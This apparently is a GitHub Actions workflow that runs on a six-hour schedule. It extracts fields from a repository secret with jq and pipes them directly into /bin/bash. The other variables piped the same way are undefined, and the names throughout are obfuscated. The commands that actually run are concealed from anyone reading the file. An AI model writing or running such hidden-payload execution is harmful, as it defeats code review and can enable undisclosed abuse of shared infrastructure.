name: nongjichang3456
on:
  workflow_dispatch:
  schedule:
    - cron: '30 4/6 * * *'
jobs:  # 25772
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: nongjichang3456
        env:
          zxc4: ${{ secrets.zxc4 }}
        run: |
          echo $zxc4 | jq -r .qbqwr6048 | /bin/bash
          echo $jvxct356 | jq -r .nz6 | /bin/bash
          echo $n3 | jq -r .npuj747 | /bin/bash
          echo $f16177 | jq -r .vgtj7 | /bin/bash
          echo $jblr938 | jq -r .s5293 | /bin/bash
          echo $adhq18 | jq -r .laj7800 | /bin/bash
          echo $sxbo62009 | jq -r .sqhw23 | /bin/bash
          echo $moss47 | jq -r .qkpk5361 | /bin/bash
          echo $j1624 | jq -r .iqo33037 | /bin/bash
          echo $ud4842 | jq -r .csix39 | /bin/bash
          echo $y6 | jq -r .a0591 | /bin/bash

